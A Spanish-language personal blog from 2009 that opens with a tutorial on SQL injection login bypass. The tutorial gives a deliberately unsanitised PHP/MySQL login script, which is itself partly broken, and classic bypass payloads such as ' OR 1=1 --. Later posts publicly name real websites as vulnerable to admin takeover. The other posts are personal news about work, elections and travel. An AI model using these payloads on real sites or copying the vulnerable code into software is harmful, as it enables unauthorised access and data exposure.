Primera parte: Login Bypass
*Nota: para que el siguiente ejemplo funcione, la función magic_quotes_gpc debe estar off en el php.ini, esta opción en las ultimas versiones de php se encuentra ON por default, pero aún podemos encontrar algunos servidores en OFF.
Analicemos la siguiente pagina en PHP /MySQL
+++++++++++++++++++++++
// mysqlinjection_login.php
// realiza la conexión con MySQL siendo
// localhost el servidor de BD, root el usuario y
// password la contraseña.
$conexion=mysql_connect("localhost","root","password");
// Utiliza la conexión anterior para leer la base
// de datos llamada mysqlinjection
mysql_select_db("mysqlinjection",$conexion);
// define la variable user y pass las cuales toma por medio del metodo POST
// para leerlas del formulario, verificar que no se están verificando.
$user=$_POST['usuario'];
$pass=$_POST['password'];
// Esas variables se usan sin “sanitizarse” en una consulta SQL
$consulta = "SELECT * FROM admin WHERE usuario='$user' and password='$pass'";
$row_consulta = mysql_fetch_assoc($consulta_browser);
// $loginok toma el valor de la cantidad de registros que cumplen la condición
$loginok = mysql_num_rows($consulta_browser);
echo $consulta; //mostramos la consulta para efectos de aprendizaje
// Si $loginok tiene algun valor, entonces nos muestra que pudimos loguearnos,
// de lo contrario nos muestra el mensaje de error
if ($loginok) {
echo "LOGIN OK!!!";
}
else
{
echo "USER/PASSWORD ERRONEOS";
}
+++++++++++++++++++++++
Vemos una aplicación normal que no verifica/sanitiza (quita caracteres que pudieran afectar la seguridad), hemos dejado la opción que muestre como queda la consulta para verificar como podemos inyectar nuestro código.
La parte que nos interesa es la siguiente:
SELECT * FROM admin WHERE usuario='$user' and password='$pass'
Si ponemos al usuario “admin” y password “clave” la sentencia queda de la siguiente forma:
SELECT * FROM admin WHERE usuario='admin' and password='clave'
No nos permite loguearnos ya que no hay ningun usuario que cumpla esas condiciones, el resultado no es verdadero.
Pero que pasa si ponemos en ambos campos algo como:
admin' (comilla simple)
Lo que nos da:
SELECT * FROM admin WHERE usuario='admin'' and password='admin''
Nos da error porque no es una sentencia valida, ya que queda una comilla simple extra, asi que buscamos la forma de generar una sentencia válida, pero que a la vez nos genere un resultado verdadero, por ejemplo:
admin' or 'x'='x
Lo que nos daria la siguiente sentencia:
SELECT * FROM admin WHERE usuario='admin' or 'x'='x' and password='admin' or 'x'='x'
Nos da LOGIN OK!!!
Veamos por qué: verifica si existe un usuario que sea admin o que x sea igual a x, no existe un usuario admin (o tal vez si, en realidad no importa) pero la condicion x=x siempre será verdadera, asi que cumple esta parte de la condición, lo mismo sucede con el password.
Otras opciones que nos dan el mismo resultado (resultado siempre verdadero):
' OR ''=' (todas son comillas simples)
' OR 1=1 – (los dos guiones al final hace que el resto de la sentencia quede “comentada” y no la toma en cuenta)
' –
admin' –
Las variantes pueden ser muchas, lo importante es lograr un sentencia válida que siempre devuelva un valor verdadero.
Después de este breve ejemplo nos vendría bien algo de humor... si no lo entienden después de este texto, igual leanlo bien ya que nos sirve de introducción para la segunda entrega, les aseguro que tendrá más forma:
http://imgs.xkcd.com/comics/exploits_of_a_mom.png
Llaman por teléfono a una madre desde el colegio de su hijo:
Colegio: Hola, es del colegio de su hijo, estamos teniendo algunos problemas con los ordenadores.
Madre: ¡Dios mío! ¿Ha roto algo mi hijo?
Colegio: Más o menos...
Colegio: ¿Su hijo se llama de verdad "Robert'); DROP TABLE Students; --"?
Madre: Oh, sí, lo llamamos "Rebertito tablas"
Colegio: Pues bien, hemos perdido todos los datos de los estudiantes de este año. Espero que esté feliz.
Madre: Y yo espero que haya aprendido a verificar las entradas a su base de datos.
Saludos!
p.d.
Correcciones, chascarrios, notas, etc... a los comentarios!
martes, julio 28, 2009
Es difícil...
En ese entonces, debido a que no tenía mayor información ni autorización de comentar al respecto, me fué realmente difícil poner buena cara ante el shock de la noticia.
No pasó mucho tiempo para que rumores y comentarios se estuvieran dando en el medio y llegaran a oídos de las personas que trabajan con nosotros, asi que llegó el momento en que consideramos era justo para todos hacer pública la noticia.
Fue dificil realmente, pero me parece que fué lo mejor.... la mina se ha portado excelente con nosotros y aún hoy se les avisa a todos con anticipación para poder, con un poco mas de tiempo, buscar nuevos rumbos.
Hoy, es difícil mantener el buen ánimo de todos, se que Dios tiene control de cada situación, pero esto es algo que no todos comprenden.
Aún no se sabe cuales son los planes de este cliente, así que hay una comitiva que está viniendo a la empresa, se le está enseñando nuestros procedimientos, sistemas, etc. pero queda esa sensación rara de estarle enseñando todo... y luego nos quedaremos sin mayor cosa.
Hay rumores que la mina seguirá (a un nivel mas pequeño, claro está), pero no son mas que eso: rumores. No tenemos información certera, así que por el momento mi futuro laboral está incierto, ya ando repartiendo curriculums con algunos conocidos, pensando y pidiendo a Dios que guie el rumbo que deba tomar, asi que si saben de algo, avisen!!!
lunes, julio 27, 2009
Mi fin de semana...
Por otra parte, el domingo estuvimos reunidas las diferentes comunidades de linux y software libre del pais debatiendo un poco sobre la futura creación/modificación de una Asociación de Software Libre de El Salvador que englobe a las otras comunidades y así podamos tener presencia formal para diferentes proyectos, así que veremos que hacemos.
saludos!
miércoles, julio 22, 2009
SQL Injection Demo... se me ocurre hacerla en vivo
Les dejo la idea por si alguien se apunta, sino... luego publico el paper!
Saludos,
[update]
Tentativamente se acaba de armar para hacerla en algún bar con internet en San Salvador el día viernes (dependerá de como este de liado en la mina) o sino veremos si armamos algo para el domingo despues de la reunion con las comunidades de software libre.
El que quiera mas información... anótese y pendiente!
viernes, julio 17, 2009
Jugando a las inyecciones...
El sitio en cuestion:
http://www.bves.com.sv
Vulnerabilidad:
SQL injection que permite luego ingresar como administrador/es del sitio.
Saludos!
jueves, junio 11, 2009
Nueva cancion para la selecta?
Muy alegre por el desempeño que ha tenido "la selecta", triste por la perdida de ayer ante Honduras, pero ni modo "el furgol es asin".
SoySalvadoreño ponia un post esta mañana haciendo referencia a una canción muy buena sobre la selecta que escuche hace unos meses por radio y que nunca pude encontrar mayor información hasta hoy, ahi hay un video, pero si necesitan el mp3 lo pueden bajar de aca.
Saludos!
domingo, mayo 17, 2009
Estoy vivo...
Al menos estoy aca dejando un post para decir "Aun vivo!", el caso es que la mina ha estado realmente dura, con poco tiempo para responder correos y otras cosas y con pocas ganas de llegar a eso de las 11:00pm a encender la compu y continuar.
Ya vendran tiempos mejores!
martes, abril 14, 2009
Reparando Compaq Presario V3000
domingo, abril 12, 2009
Se acabaron las vacas...
Así comenzamos una nueva etapa de trabajo, con bastante que hacer, con mucho trabajo por hacer pero con ganas de darle para adelante!
Me dí vacaciones tranquilas en casa, descansando lo que se puede, al menos un cambio de rutina y dormir un poco mas de lo normal.
Poca actividad en este blog... pero un poco mas en twitter, ahi vamos haciendo de todo un poco!
Saludos!
viernes, abril 03, 2009
Reunion de Twitteros y Bloggers
Ya sali un poco tarde de aca, pensando en dar un poco de tiempo para que llegaran, asi que tipo 10:30am estaba entrando a Multiplaza, entré al foodcourt pero no veía ningún grupo, así que como tampoco iba a comer nada todavía salí por el otro lado y fui a darme una mi "vuelta". Rapidamente encontré la red de turbonett y me puse a twittear para ver donde andaba la gente... parecía que nadie había venido. Volví a entrar a ver si veía a alguien sospechoso, vi a alguien que estaba sentado solo y viendo para todos lados cerca del Mister Donut, entré dispuesto a tomarme un cafe, pero no había señal wireless ahi... asi que rápidamente me salí y vi que la persona que estaba sentada sola me miró de reojo... volví salir y me dijeron que por ahi estaba @hvts, a quien no conocía pero me puse a ver la photo de twitter, en eso vi que iba entrando alguien con telefono en mano y viendo para todos lados... "este ha de ser pense...", dejé que se sentara y lo primero que hizo fue ver para todos lados y tomar su telefono (bueno, en realidad era un ipod touch) asi que me levante y efectivamente resultó ser @hvts así que comenzamos a hablar. Al rato vimos que venía alguien con camiseta de twitter y nos saludo, nuestra sorpresa fue que al saludarnos se acercó otro grupo que estaba en otra mesa y efectivamente, la otra persona que había visto "sospechosa" resultó ser Samuel Bran... luego, al buen rato comenzarón a llegar los demas twitteros.
Pasamos un buen rato, lastima que me retiré antes que terminara la reunión y no tuve oportunidad de conocer a los que llegaron después... otra vez será.
Fue bueno poner "una cara al nombre" de las personas que nos leemos!
Nos veremos en la proxima!
Updated: AHHH se me olvidaba incluir la lista oficial de los asistencias, en el blog que QUeith!
lunes, marzo 23, 2009
Twittblogs & Multi
Algo ausente de este blog los últimos días aunque siempre se me puede encontrar en IRC y ahora twiteando, después de tener mis reservas al respecto me decidí utilizarlo y he encontrado gente muy interesante por ahí, la mayoría de twitters también son bloggeros.
Hace tiempo ya se hicieron un par de reuniones bloggers (no pude asistir a ninguna), pero para este 29 de Marzo se está organizando la primera reunión de twitters y bloggers denominada: Twittblogs & Multi.
Aca se da la invitación oficial.
A continuación los detalles:
Asunto: REUNION TWITTBLOGS & MULTI (Bloggeros y twitteros salvadoreños)
Dia: domingo 29 de marzo 2009
Lugar: CENTRO COMERCIAL MULTIPLAZA, area del food court (no olvidar).
Hora: 10AM (para almorzar juntos) a 5PM (o hasta que decidan)
Haré todo lo posible por ir, pero aún no prometo nada!!!
Saludos!
domingo, marzo 15, 2009
El Salvador ha hablado!!!
Los resultados aún no oficiales muestran que es una ventaja bastante corta lo que muestra lo dividido que está el país, sin embargo, Mauricio Funes en su discurso (muy bueno por cierto) hace un llamado al apoyo y unidad de todo el pueblo salvadoreño.
Al final de cuentas, los que ganaron o perdieron tienen que quedar atras, extenderse a lo que está adelante y trabajar TODOS por un mejor El Salvador.
El FMLN tiene un gran reto por delante, mucho por demostrar, hoy es momento justo de ganar terreno (aún mas de lo que ganó en estas elecciones), el país está en un momento muy duro y el nuevo gobierno no tiene nada facil el camino, sin embargo, desde este humilde rincón pedimos a Dios le de sabiduría al nuevo presidente de El Salvador, Mauricio Funes, desde acá pedimos muchas bendiciones al pueblo salvadoreño que demostró una gran madurez este día!
Es de notar la gran labor que los twiteros y bloggeros salvadoreños realizaron cubriendo durante todo el día el evento, enhorabuena por este increible medio de información que fué un excelente apoyo y aporte para estar siempre al día!
Mañana comienza una nueva semana, una nueva etapa de nuestro querido El Salvador, todo cambio es traumático, pero confiamos en Dios que el que ganó esta noche, no ha sido un partido ni tendencia política, sino quien ganó es el pueblo salvadoreño al demostrar su democracia y hacer valer el deseo de la mayoría.
Saludos y bendiciones en este camino por delante!!!
Huele a cambio...
Saludos!
Elecciones en vivo!
Una prueba de ello es la cobertura de las elecciones minuto a minutos que los "twitters" están haciendo, edwin se ha puesto dicha covertura en su pagina, asi que ha informar en vivo!
En unos momentos me dispongo a ir a ejercer mi voto, clima bastante rico gracias a la lluvia que hubo en la noche (que por cierto... mojo el intenerior de mi vocho al no contar con vidrios).
Saludos y a votar con tranquilidad, Que Dios nos ilumine para tomar la mejor decisión y que sea quien sea que quede, que tenga la sabiduría de Dios para dirigir nuestra patria!
Saludos,
viernes, marzo 13, 2009
Somos Salvadoreños
Cuando nos encontramos con otro paisano fuera de nuestro terruño es mas fácil dar/encontrar apoyo, por qué esperar a estar fuera de nuestra patria para hecharnos la mano al saber que somos salvadoreños? Estamos aqui, podemos hacerlo hoy!
Bonito post Edwin!
Probando Twitter
miércoles, marzo 11, 2009
Al fin nos daran descanso!
Creo que es la elección donde mas fea he visto las campañas electorales... creo que será la elección donde tristemente iré a votar nada mas por cumplir con mi deber ciudadano, pero donde, a mi punto de vista muy personal, ambos candidatos han dejado MUCHISIMO que desear.... donde desgraciadamente llego a un punto sin opciones.
Solo espero que después limpien nuestras ciudades de tanta propaganda, solo espero las elecciones se den sin violencia y se respete el pensamiento y la elección de todos, que haya claridad y transparencia, solo espero que algún día tengamos un presidente por el cual verdaderamente valga la pena ir a votar, solo espero que algún día nuestro querido El Salvador pueda ser visto con buenos ojos por el mundo...
Solo espero...
lunes, marzo 09, 2009
El Salvador en las series Estadounidenses...
- Carlos "Carlito" Mendez, MS-13
- Salvadoreño!
- Ex militante de la guerrilla F.M.L.N...
Se imginaran mi cara al escuchar eso en una serie... suficiente con que relacionen a El Salvador con lo malo para que para colmo hagan referencia a las maras y al FMLN... es una serie relativamente nueva por lo que no dejó de sorprenderme el caso y mas aún cuando hacen referencia a lo que ahora es un partido político... definitivamente no tenemos buena imagen internacional... y mas aún cuando series de otros paises, que se transmiten a nivel mudial se encargar de seguir hechándonos tierra...
Claro... solo es mi opinion.
Saludos!
Hello world!
jueves, marzo 05, 2009
Este dia.... varias fechas para recordar
Ya nacio Fernanda Abigail
Saludos!
miércoles, marzo 04, 2009
SQL Injection avisado y todavia vigente
Viendo mas detenidamente el sitio en cuestión veo que fue hecho por una empresa multinacional dedicada al rubro, aún no me decido si avisarles también, considerando que las personas encargadas ya deberían de haberlo hecho.
Digo, si alguien me dice que mi sitio web esta mostrando las contraseñas de los administradores y que de esta forma se puede agregar, borrar o editar.... en lo personal si no lo puedo arreglar... pues deshabilito el acceso... pero fue triste ver la preocupación de esta gente y mas cuando leo sus políticas de seguridad:
Marco en negrita la parte interesante, será que están poniendo todo su esfuerzo para asegurar la información de los usuarios, al final.. es resonsabilidad del usuario no? al entrar puedo ver correos, nombres , etc de los mismos... y esta gente no ha hecho nada en mas de un mes por arreglar lo mas minimo! claro, la responsabilidad es del usuario...La seguridad de toda la Información Personal que pueda identificar a los usuarios es lo más importante para nosotros. Nosotros ponemos gran cuidado para procurar una transmisión de información segura de su computadora personal a nuestros servidores.
Desafortunadamente, ninguna transmisión de datos en Internet podrá ser garantizada al 100%. Como resultado, en la medida que nos esforzamos en proteger la Información Personal, no es posible asegurar, garantizar o responsabilizarse de la seguridad de la información transmitida a nosotros o transmitida desde nuestros productos o servicios en línea, en el entendido que usted lo hará bajo su propio riesgo.
Una vez que recibamos la transmisión haremos nuestro mejor esfuerzo para asegurar la seguridad de la información personal en nuestros sistemas.
Para todas las transacciones electrónicas e información financiera relacionada, el Sitio utiliza el protocolo de seguridad Secured Socket Layer (SSL) para transferir datos del navegador al servidor, utilizando certificado digital en el servidor web respaldado por la empresa TWATWE SGC CA.
Ante este tipo de situaciones a veces dan ganas de publicar las cosas como para hacer un "Mini-reto en vivo" y es que vagando por internet uno puede encontrarse con tantos sitios que son vulnerables de alguna manera a este tipo de cosas... por ejemplo podemos hablar de un sitio con un concurso para ganarse un ipod... o se imaginan si el padrón electoral fuera vulnerable y todos nuestra información anduviera por ahi? ooppss... no estoy asegurando que lo es... posiblemente si lo sea, posiblemente no... con algún poco de tiempo es probable que si... en fin basta de trabalenguas y a los administradores y webmasters, mas vivos!
lunes, marzo 02, 2009
Oh Jerusalen - La Película
La película es un drama que gira en torno a 1948 y la institución de Israel como estado. Dos amigos viviendo en Nueva York, uno arabe y el otro judío quienes regresan a Jerusalen para pelear por su tierra.
Por aca pueden ver el trailer y acá está la pelicula completa, claro también la pueden buscar para bajarla ya que no creo que la veamos por aca...
Muy buenas imagenes, buena musica, buen trama...
Seré yo que estoy enamorado de Jerusalen que casi lloro reflexionando en todo lo que dicen de Jerusalen: "Si Dios no está acá, no está en ninguna parte!", "Significa: Ciudad de Paz"... y sin embargo Jerusalen siempre ha estado rodeada de historia de guerra y destrucción, no en vano el salmista decía:
Pidamos por la paz de Jerusalén: "Que vivan en paz los que te aman. Que haya paz dentro de tus murallas, seguridad en tus fortalezas."Hay una parte en la película que me impactó y justo es cuando se menciona también otro salmo del poeta David:
Ah, Jerusalén, Jerusalén, si llegara yo a olvidarte, ¡que la mano derecha se me seque! Si de ti no me acordara, ni te pusiera por encima de mi propia alegría, ¡que la lengua se me pegue al paladar!
Que haya paz en Jerusalen!
viernes, febrero 27, 2009
Tiempos de crisis, según Albert Einstein
--------
No pretendamos que las cosas cambien, si siempre hacemos lo mismo. La crisis es la mejor bendición que puede sucederle a personas y países porque la crisis trae progresos.
La creatividad nace de la angustia como el día nace de la noche oscura. Es en la crisis que nace la inventiva, los descubrimientos y las grandes estrategias. Quien supera la crisis se supera a sí mismo sin quedar superado. Quien atribuye a la crisis sus fracasos y sus penurias, violenta su propio talento y respeta más a los problemas que a las soluciones.
La verdadera crisis es la crisis de la incompetencia.
El problema de las personas y los países es la pereza para encontrar salidas y soluciones. Sin crisis no hay desafíos, sin desafíos la vida es una rutina, una lenta agonía. Sin crisis no hay méritos. Es en la crisis donde aflora lo mejor de cada uno, porque en crisis todo viento es caricia.
Hablar de crisis es promoverla, y callar en la crisis es exaltar el conformismo.
En vez de esto trabajemos duro. Acabemos de una vez con la única crisis amenazadora: la tragedia de no querer luchar por superarla.
Albert Einstein
sábado, febrero 21, 2009
Baileys with a hint of coffee
Regresando de Honduras, en las tiendas libres del aereopuerto pasé comprando el encargo de mi hermano, un baileys de menta y la persona que me atendió me preguntó si ya había probado los otros sabores y me mencionó el de cafe... le pregunté de nuevo por ese de café y me lo enseñaron... y me lo traje.
Sabe bastante bien, definitivamente recomendado para quienes les gusta el cafe... y el baileys por supuesto.
Saludos!
viernes, febrero 20, 2009
Ya casi de regreso...
Esta vez no hubo mucho tiempo para nancing, llegaba ya algo tarde al hotel y preferí descansar a salir a vagar un rato en la noche... ya habrá alguna otra oportunidad mas adelante.
Por otra parte, la gente de la mina de Honduras se portó de lo mejor conmigo, muchas atenciones, mucha comida (también ahi van otro par de libras gracias a ellos y los snacks que habían en los recesos).
A pesar de todo... hace falta estar en /home/cisko, pero ya se acabó la semana... voy de regreso!
martes, febrero 17, 2009
Upgrade en Hilton San Pedro Sula
Pero... de donde recibí mi upgrade?
Nadie sabe, nadie supo... pero no fue horrible!!! tengo la idea de que fué debido a una encuesta que me hicieron por mi estadía hace un par de semanas, entre otras cosas al final puse mis comentarios de que no había sido una estadía del todo agradable... en esa ocasión como que se hospedaba algún equipo de futbol de niños... la buya se pasaba hasta mi habitación hasta tarde... luego que regresé a la habitación todavía no estaba todo ordenado y llegaron a hacerlo cuando ya estaba ahi... claro, todo esto en realidad a mi no me importaba del todo, yo igual dormía hasta tarde, los que me conocen saben que duermo donde sea, pero, ya que me preguntaban y la idea es para mejorar... dije las cosas... así que creo que por ahí va el asunto... y acá me encuentro disfrutando de las atenciones en piso ejecutivo....
Gracias a Dios por sus atenciones!
Post desde el aereopuerto...
Hace poco comentaba con un amigo el hecho de que acá en El Salvador es fácil encontrar lugares con internet gratis, en otros países no es así... en Honduras por ejemplo, parece ser que hay internet inalambrico pero no disponible para los simples mortales que estamos a la espera en el aereopuerto.
Sería excelente que el internet algún día fuera puesto a disposición de todos, la verdad es una herramienta como ninguna otra: comunicación, información, entretenimiento... uno puede encontrar absolutamente lo que quiera en internet.
Claro... si fuera gratuito ya no sería negocio para las grandes compañías... un subsidio del gobierno quizá funcionaría?... bah, nada mas mis pensamientos utópicos agradeciendo la "interné".
Saludos!
viernes, febrero 13, 2009
De regreso a Honduras!
Salud!
jueves, febrero 12, 2009
Palm tendra webos?
Se escucha algo raro no? claro, nosotros estamos en El Salvador, donde en español tener webos es una expresión algo rara... sin embargo Palm tendra webos, pero no malinterpreten, ese es el nombre del futuro sistema operativo que tendrán las palm, dejando de lado su antiguo sistema del 1996. Cambia... todo cambia, ahora tendremos un telefono con webos.
http://www.palm.com/ve/products/smartphones/pre/
Saludos!
Es una niña!
Iphone Shell: Apt-get, debs y demas..
Existe la aplicación Cydia que implementa apt en el iphone... tambien la aplicacion OpenSSH con la que conseguí la shell de arriba... ya me sentí bastante en confianza: el apt-get update funciona muy bien, las passwords no estan shadowed, algunos comandos como fstab, dmesg, nano y otros tambien funcionan:
No es de extrañarse el adelanto que lleva ya el proyecto para poner linux en el iphone, ademas parece ser que este tipo Saurik ya hizo correr debian en el iphone... pueden encontrar mas información sobre varios proyectos que tiene Saurik en su pagina (como por ejemplo, el soporte de aplicaciones Python...), definitivamente, necesito un poco mas de tiempo para leer al respecto... podremos algún día contar con un iphone cuasi-liberado?
Saludos!